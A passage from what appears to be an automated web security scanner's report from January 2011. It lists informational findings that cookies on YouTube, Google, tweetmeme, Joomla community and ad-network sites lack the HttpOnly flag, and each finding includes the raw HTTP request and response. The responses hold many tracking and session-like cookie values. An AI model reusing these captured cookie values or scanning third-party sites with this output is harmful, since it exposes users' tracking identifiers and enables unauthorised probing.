0elfk1rn000000010o010501101jwblfk1rn000000010o010501101xw
blebnns0000000g0o02050210f; sglst=2140s8dtletz4d0pqa500a0l000400100a70lebnns181qq00e0l00040010061gletz4d0pqa500a0l0004001005b0lf17qo000000060o020502106ag2leqh190tkqe00d0o02050210d82gletz4d0pqa500a0l0004001009zdlebnns181qq00e0l00040010082hlebnns181qq00g0o02050210f5q7letz4d0pqa500a0l000400100a6slebnns181qq00e0l000400100achlebnns181qq00e0l0004001007x9lebnns181qq00e0l000400100b1alfjpei000000020o020502102820lebnns181qq00e0l000400100b0olfjpei000000020o020502102ab4lebnns181qq00g0o02050210f9szlebnns181qq00g0o02050210f8wklebnns181qq00e0l000400100923lebnns181qq00e0l000400100ahllebnns181qq00e0l0004001000tllegh2b13kpc00f0o02050210fal1letz4d0pqa500a0l0004001008lllebnns181qq00e0l000400100abulebnns181qq00e0l0004001005q8lebnns181qq00e0l0004001007y2lebnns181qq00e0l0004001008bgletz4d0pqa500a0l000400100b0clfjpei000000020o020502102b08lfjpei000000020o02050210240slebnns181qq00e0l00040010045mlfdxmc000000030o020502103a97lebnns181qq00e0l000400100ah4lebnns181qq00e0l0004001003s4letz4d0pqa500a0l00040010040uletz4d0pqa500a0l000400100acdlebnns181qq00e0l000400100aanlebnns181qq00e0l0004001009atlebnns181qq00e0l00040010086zlebnns181qq00e0l000400100ac3letz4d0pqa500a0l000400100

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
Set-Cookie: clid=2lebnns011706ch47d7o8wtv18fgn00h0o03050310g; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
Set-Cookie: orblb=2lfk1rn012dh10u0100000; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
Set-Cookie: rdrlst=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; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
Set-Cookie: sglst=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; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
Location: http://r.openx.net/set?pid=1c6323e9-0811-5464-3af4-c00f47248395&rtb=6ch47d7o8wtv
Content-Length: 0
Date: Tue, 25 Jan 2011 02:05:02 GMT


14.283. http://il.youtube.com/watch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://il.youtube.com
Path:   /watch

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
  • VISITOR_INFO1_LIVE=oSlc8a237Qg; path=/; domain=.youtube.com; expires=Wed, 21-Sep-2011 22:36:38 GMT
  • GEO=76ddae6b596d22d70649c3f298d7779ecwsAAAAzVVOtwdbzTT3+9g==; path=/; domain=.youtube.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /watch HTTP/1.1
Host: il.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 303 See Other
Date: Mon, 24 Jan 2011 22:36:38 GMT
Server: wiseguy/0.6.7
Content-Length: 0
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=oSlc8a237Qg; path=/; domain=.youtube.com; expires=Wed, 21-Sep-2011 22:36:38 GMT
Set-Cookie: GEO=76ddae6b596d22d70649c3f298d7779ecwsAAAAzVVOtwdbzTT3+9g==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Location: http://www.youtube.com/das_captcha?next=http%3A%2F%2Fil.youtube.com%2Fwatch&ytsession=9CCes4D_KlNIl7SiPulxyCata5FvenJFf1wQWKCp1FfowW4Ruca5frrRInIZHQDHadMY2zzc7eC949j37txZqBMfbtlMX76yyqg5YaUJdpArzok6qvSJGE2qJmTQ9us2_jirFmCfOuioCIHWzOYfDjeH5EK1C8wyNCA6uBNcN2zBzk-rtHd9cUnRz_cypFXxyGkfU6vqIN2wK124Rc1nHvt5kfu7275zZvGpAhvL8mAbr918TS_LFBmxlw8xwHA5YsyHQat_Or43vMW4bg-eXOa17nSCXUzcfvry5x_x-4tgaww7-soXyA
Connection: close


14.284. http://images.google.com/images

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.google.com
Path:   /images

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PREF=ID=28805e2640abba72:FF=0:TM=1295967942:LM=1295967942:S=XgbrdIg30yELc79u; expires=Thu, 24-Jan-2013 15:05:42 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images HTTP/1.1
Host: images.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Location: http://images.google.com/imghp
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=28805e2640abba72:FF=0:TM=1295967942:LM=1295967942:S=XgbrdIg30yELc79u; expires=Thu, 24-Jan-2013 15:05:42 GMT; path=/; domain=.google.com
Set-Cookie: NID=43=mcWAgK1ANMXxEaYpa4k28PPWxEgiMiXMY9JyNAZAwpdg3u-yZ4eQip59-1LTLikEZX9_Vg6M2deQCgacPaIumRuV0AAahKaZM3THMQhm32QzECiAxEpv3mwYDylZXsml; expires=Wed, 27-Jul-2011 15:05:42 GMT; path=/; domain=.google.com; HttpOnly
Date: Tue, 25 Jan 2011 15:05:42 GMT
Server: gws
Content-Length: 227
X-XSS-Protection: 1; mode=block
Connection: close

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://images.google.com/imghp">
...[SNIP]...

14.285. http://iphone.tweetmeme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://iphone.tweetmeme.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • tm_identity=ad1cdf367a61d114c08b9bc313cec24d; expires=Tue, 01-Feb-2011 15:05:55 GMT; path=/; domain=.tweetmeme.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: iphone.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 15:05:55 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=ad1cdf367a61d114c08b9bc313cec24d; expires=Tue, 01-Feb-2011 15:05:55 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0074069499969482
X-Served-In: 0.058972120285034
X-Served-By: h01
Content-Length: 42596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- title -->
   <title
...[SNIP]...

14.286. http://joomfa.org/joomla-16-persian.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomfa.org
Path:   /joomla-16-persian.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 16f55cf570d6624bbeb58e495d6f30df=a849d8a3dc9bc34166a8c90be1725ca5; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /joomla-16-persian.html HTTP/1.1
Host: joomfa.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 22:39:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: 16f55cf570d6624bbeb58e495d6f30df=a849d8a3dc9bc34166a8c90be1725ca5; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 22:39:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fa-ir" lang="fa-ir" >
   <
...[SNIP]...

14.287. http://joomla.jp/news/1-projectnews/169-joomla-16-has-arrived.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomla.jp
Path:   /news/1-projectnews/169-joomla-16-has-arrived.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 7f6aa8350e5d9f947c38b269b8976dc4=4a235261b46f8b2ee986298970074f38; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/1-projectnews/169-joomla-16-has-arrived.html HTTP/1.1
Host: joomla.jp
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:37:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.10-pl0-gentoo
Set-Cookie: 7f6aa8350e5d9f947c38b269b8976dc4=4a235261b46f8b2ee986298970074f38; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 22:37:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15767

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...

14.288. http://joomla.pl/powiadomienia/577-joomla-16-wydany.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomla.pl
Path:   /powiadomienia/577-joomla-16-wydany.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 4133b150d3474bb471372c7e0b1cd514=f7c7ef79892a51ea61ed57003bef1c55; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /powiadomienia/577-joomla-16-wydany.html HTTP/1.1
Host: joomla.pl
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:37:05 GMT
Server: Apache
Set-Cookie: 4133b150d3474bb471372c7e0b1cd514=f7c7ef79892a51ea61ed57003bef1c55; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 22:37:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30587


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pl-pl" lang="pl-pl" >
...[SNIP]...

14.289. http://joomladaywest.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomladaywest.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • f4aaeac59edff6688553483de8bbfaa8=a395c8457293151f4f06fc703f0be19c; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: joomladaywest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:24:27 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f4aaeac59edff6688553483de8bbfaa8=a395c8457293151f4f06fc703f0be19c; path=/
Last-Modified: Tue, 25 Jan 2011 16:24:27 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
...[SNIP]...

14.290. http://joomladaywest.com/sponsors

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomladaywest.com
Path:   /sponsors

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • f4aaeac59edff6688553483de8bbfaa8=3f4a17211ce3ef3f5426d699b92295e9; path=/
  • rokweather_location=San+Jose%2C+CA; expires=Wed, 25-Jan-2012 16:23:14 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sponsors HTTP/1.1
Host: joomladaywest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:23:13 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f4aaeac59edff6688553483de8bbfaa8=3f4a17211ce3ef3f5426d699b92295e9; path=/
Set-Cookie: rokweather_location=San+Jose%2C+CA; expires=Wed, 25-Jan-2012 16:23:14 GMT; path=/
Last-Modified: Tue, 25 Jan 2011 16:23:17 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
...[SNIP]...

14.291. http://joomladaywest.com/the-conference/keynote-speakers

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomladaywest.com
Path:   /the-conference/keynote-speakers

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • f4aaeac59edff6688553483de8bbfaa8=936574c2ff061b089c217e85dbbff94a; path=/
  • rokweather_location=San+Jose%2C+CA; expires=Wed, 25-Jan-2012 16:22:53 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /the-conference/keynote-speakers HTTP/1.1
Host: joomladaywest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:22:53 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f4aaeac59edff6688553483de8bbfaa8=936574c2ff061b089c217e85dbbff94a; path=/
Set-Cookie: rokweather_location=San+Jose%2C+CA; expires=Wed, 25-Jan-2012 16:22:53 GMT; path=/
Last-Modified: Tue, 25 Jan 2011 16:22:54 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
...[SNIP]...

14.292. http://joomlaportal.ru/content/view/2239/70/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlaportal.ru
Path:   /content/view/2239/70/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 5fc991999f8b2e5e5bb2e3566d439f1f=be443c241334634b0c6c368448814be8; expires=Tue, 25-Jan-2011 10:41:10 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/view/2239/70/ HTTP/1.1
Host: joomlaportal.ru
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 24 Jan 2011 22:41:10 GMT
Content-Type: text/html; charset=windows-1251
Connection: close
X-Powered-By: PHP/5.2.10
ETag: 62229839aa89cfd54c936ea9dd5cac22
Set-Cookie: 5fc991999f8b2e5e5bb2e3566d439f1f=be443c241334634b0c6c368448814be8; expires=Tue, 25-Jan-2011 10:41:10 GMT; path=/
Last-Modified: Tue, 11 Jan 2011 11:16:11 GMT
Content-Length: 20791

<?xml version="1.0" encoding="windows-1251"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19
...[SNIP]...

14.293. http://js.revsci.net/gateway/gw.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • udm_0=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; Domain=.revsci.net; Expires=Tue, 24-Jan-2012 21:06:41 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=K04491 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; udm_0=MLvv8iMJPj5n556Bo8jwxg27aVMsKvlZeh88v6LFxvi6NShB6ZO83AmHuP4JgK9bvgpJZgsqUaP2xfTnxNPh9+fmSEPkCVwJX705HIrDAdU6h9yhStmEjquZrguVeF3r0KH2OzLBVWAxUkwC4gAcARichgtw510EVacnhilf+8mRFAtdqKZBM6NUyjil0ZdVPRDqI+Ti+FIe6fewtlE9GinOst7C+rlOGLcLpjRwr3ZfMSayOJgkjwJdHiBSJ9kAcsoTnnNvaA7Xcb0oB88geiObO0gCWiOMGKuhN5NhpXa5wNJrUpjtCGmrVtVPNsrxL9ryWzajTucvw6SIgD8tYcWt49xZgaknzfQMm4nMuUr+qb1f+Ms3ek2Rc8bT/TWEYTevTxXB1YSJNhNpyO+5lLFTcDcxf+duWIK8eU0eIZAncGmWmIMN2HAprOXDL92vjPG5GfbTEfgpUERmJC38xypT/U/eZtb2YBNcle27OeZkVpQY88kycEdRsS0Ks4HLd9MJ6YiDUxLI3FUlyF0iCBOApuRiSn2zDur8XA1O6kZwXMP/vqnO/qlcm8YSMQteDyI8xTLOkrtw5XuzDTiehCDdIT5AUFXEVikG1xbWOf61/rLXUN710OVSlXuiKpp7slVOdtdIlvK5Ef2r/dR4A+dOCYr8QFU/PgPleGbyIL5+FSmkfzlkK9kpSlXIgokpHC3DmN7FSnZ4W681z5mM3+bkQyAQa1deCg6dY3j8xQBsPgkVRyyliBZ/BT5AfFB6Kt2bfoD+HZA9FOS08BLyiny5VyDBbEms9liC5Fs3TFj1lR+RyszTbus6ezqbVXF77t83kYCDwMJ+4srH8tO8ZoaqbVgfKSopwI144BcK1RceyhLfvKeO2mls6933wcTzEXOpWYxsjrgl5Q==; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=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; rsi_segs_1000000=pUPFfUnF7gMUVVNGyQq6Tc2UE03EygBbRXVdvuFY1BA6MUfyIuV86Lli0TAjp7vTbarnvaHN9T2ow1lTs80IFRatyDifWyk9mf1Kh7aRP1Ys1ciYX3r+3g5rrIF04H4FAiutUjgMss6NEqGMIeSYHxakEN/DRePx1bwHrbhXzJD91WqT8N1pQYXg+GpVj1vtVjK1+AiwL4ScNYq0oKT0cw==; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F2LgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S23vXs9VpSODtSfbRXbKeKsIfm/9vVCVRHq5E9dPOyJm5LyxhQ0JLpdlLRkRi1AuT5G8QYh4GpDTxObx7HqsmwclpQmx8PITjRXvTVnlGDfiP+KG3TuYhIgfdoMdRUNcxsYfj/XLnOWpzH6FblA==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Tue, 24-Jan-2012 21:06:41 GMT; Path=/
Last-Modified: Mon, 24 Jan 2011 21:06:41 GMT
Cache-Control: max-age=3600, private
Expires: Mon, 24 Jan 2011 22:06:41 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Date: Mon, 24 Jan 2011 21:06:41 GMT
Content-Length: 5862

//Vermont-12.4.0-1012
var rsi_now= new Date();
var rsi_csid= 'K04491';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){this._rsiaa=Da;this._rsiba
...[SNIP]...

14.294. http://justinbieber.tweetmeme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://justinbieber.tweetmeme.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • tm_identity=e7b93a4f4c08aa6fe8ee06832daf5cfd; expires=Tue, 01-Feb-2011 16:26:48 GMT; path=/; domain=.tweetmeme.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: justinbieber.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 16:26:48 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=e7b93a4f4c08aa6fe8ee06832daf5cfd; expires=Tue, 01-Feb-2011 16:26:48 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.013036966323853
X-Served-In: 0.72553992271423
X-Served-By: ded2061
Content-Length: 42518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- title -->
   <title
...[SNIP]...

14.295. http://jxtended.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jxtended.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 6c37e8bd0240127217c04b915442f361=3ec280dd7e0fe2d662e6892192cf45b2; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: jxtended.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Expires: Sat, 05 Mar 2011 22:43:31 GMT
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: max-age=3456000
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Set-Cookie: 6c37e8bd0240127217c04b915442f361=3ec280dd7e0fe2d662e6892192cf45b2; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Last-Modified: Mon, 24 Jan 2011 22:43:32 GMT
Pragma: no-cache
Date: Mon, 24 Jan 2011 22:43:32 GMT
Server: lighttpd/1.4.19
Content-Length: 14152

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base
...[SNIP]...

14.296. http://k.collective-media.net/cmadj/cm.martini/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.martini/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • cli=11de1c500e0115c; domain=collective-media.net; path=/; expires=Thu, 24-Jan-2013 16:30:36 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cmadj/cm.martini/ HTTP/1.1
Host: k.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
Content-Length: 7047
Date: Tue, 25 Jan 2011 16:30:36 GMT
Connection: close
Set-Cookie: JY57=CT; expires=Tue, 22-Feb-2011 16:30:36 GMT; path=/; domain=.collective-media.net
Set-Cookie: cli=11de1c500e0115c; domain=collective-media.net; path=/; expires=Thu, 24-Jan-2013 16:30:36 GMT
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...

14.297. http://khm0.google.com/kh/v/x3d76/x26

Summary

Severity:   Information
Confidence:   Certain
Host:   http://khm0.google.com
Path:   /kh/v/x3d76/x26

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PREF=ID=a90843375ef24eb2:TM=1295973379:LM=1295973379:S=y00SfeV21WdWqUTv; expires=Thu, 24-Jan-2013 16:36:19 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kh/v/x3d76/x26 HTTP/1.1
Host: khm0.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=a90843375ef24eb2:TM=1295973379:LM=1295973379:S=y00SfeV21WdWqUTv; expires=Thu, 24-Jan-2013 16:36:19 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Tue, 25 Jan 2011 16:36:19 GMT
Server: btfe
Content-Length: 1368
X-XSS-Protection: 1; mode=block
Connection: close


<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>404 Not Found</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A {fon
...[SNIP]...

14.298. http://khm1.google.com/kh/v/x3d76/x26

Summary

Severity:   Information
Confidence:   Certain
Host:   http://khm1.google.com
Path:   /kh/v/x3d76/x26

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PREF=ID=cf9e7ea08ee15b44:TM=1295973396:LM=1295973396:S=r_nSTLT0WyjGau-L; expires=Thu, 24-Jan-2013 16:36:36 GMT; path=/; domain=.google.com
